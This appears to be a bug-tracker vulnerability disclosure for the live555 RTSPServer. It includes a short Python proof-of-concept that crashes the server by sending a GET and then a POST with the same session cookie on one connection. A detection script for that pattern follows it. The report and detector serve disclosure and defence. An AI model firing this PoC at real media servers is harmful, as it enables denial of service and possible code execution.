I found a new way to make RTSPServer crash in the latest version 0.93 when RTSP-over-HTTP tunneling is supported.
I only need to send two HTTP requests in one TCP connection.
The problem occurs in RTSPServer.cpp:853, where it calls handleHTTPCmd_TunnelingPOST.
If I first send an HTTP GET packet with a specific sessionCookie, and then send an HTTP POST packet with this sessionCookie in the same TCP connection,
RTSPServer will call an erroneous virtual function pointer in the readSocket function (GroupsockHelper.cpp), and the pointer value comes from the heap, which may be controlled.
Attack PoC Python code:
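```python
from socket import *

# Placeholder from the original report: the address of the test server.
target_ip = REMOTE_SERVER_IP
target_port = 554  # or 8554

tcp = socket(AF_INET, SOCK_STREAM)
tcp.connect((target_ip, target_port))

# Both requests carry the same x-sessioncookie value.
# Bytes literals so that send() also accepts them on Python 3.
http_request_GET = b'''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''
http_request_POST = b'''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''

# GET first, then POST on the same TCP connection.
tcp.send(http_request_GET)
data = tcp.recv(1024)
tcp.send(http_request_POST)
tcp.close()
```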
It will cause a DoS attack and potential remote command execution in version 0.93 (I verified), and even in all earlier versions (this is just my unverified guess).
ISSUE DESCRIPTION
The project website: http://www.live555.com/liveMedia/
You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.
Original vulnerability discoverer:
许彬彬 Xubinbin
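A detection sketch for the request pattern described in the report, added here as an example and not part of the original issue or of live555: RTSP-over-HTTP tunneling normally carries the GET and the POST on two separate TCP connections linked by the same x-sessioncookie, so a GET followed by a POST with the same cookie on one connection is worth flagging. The function names and the sample streams are hypothetical and constructed for illustration; the input is assumed to be the reassembled client-to-server bytes of a single connection.

```python
import re

# Added defensive example (not from the issue or live555). Input is the
# client-to-server bytes of ONE TCP connection, e.g. reassembled from a pcap.
REQUEST_LINE = re.compile(rb"^(GET|POST) \S+ HTTP/1\.[01]\r?$", re.MULTILINE)
COOKIE = re.compile(rb"^x-sessioncookie:[ \t]*([^\r\n]*)", re.MULTILINE | re.IGNORECASE)
END_OF_HEAD = re.compile(rb"\r?\n\r?\n")


def tunnel_requests(client_bytes):
    """Yield (method, cookie) for each HTTP request head carrying x-sessioncookie."""
    for line in REQUEST_LINE.finditer(client_bytes):
        rest = client_bytes[line.end():]
        end = END_OF_HEAD.search(rest)
        head = rest[:end.start()] if end else rest  # tolerate a truncated head
        cookie = COOKIE.search(head)
        if cookie:
            yield line.group(1).decode(), cookie.group(1).strip().decode("latin-1")


def same_connection_cookie_reuse(client_bytes):
    """Return cookies that appear in a GET and then in a POST on this connection."""
    seen_in_get, flagged = set(), []
    for method, cookie in tunnel_requests(client_bytes):
        if method == "GET":
            seen_in_get.add(cookie)
        elif cookie in seen_in_get and cookie not in flagged:
            flagged.append(cookie)
    return flagged


# Constructed sample streams. SUSPECT mirrors the request order in the report;
# the NORMAL_* streams model a client that uses one connection per request.
SUSPECT = (
    b"GET / HTTP/1.1\r\nx-sessioncookie: AAAAABBBBBB\r\nAccept: application/text\r\n\r\n"
    b"POST / HTTP/1.1\r\nx-sessioncookie: AAAAABBBBBB\r\nAccept: application/text\r\n\r\n"
    b"This is test data\r\n"
)
NORMAL_GET_CONN = (b"GET /stream HTTP/1.0\r\nx-sessioncookie: c2FtcGxl\r\n"
                   b"Accept: application/x-rtsp-tunnelled\r\n\r\n")
NORMAL_POST_CONN = (b"POST /stream HTTP/1.0\r\nx-sessioncookie: c2FtcGxl\r\n"
                    b"Content-Type: application/x-rtsp-tunnelled\r\n\r\nT1BUSU9OUw==")

if __name__ == "__main__":
    for name in ("SUSPECT", "NORMAL_GET_CONN", "NORMAL_POST_CONN"):
        print(name, same_connection_cookie_reuse(globals()[name]))
```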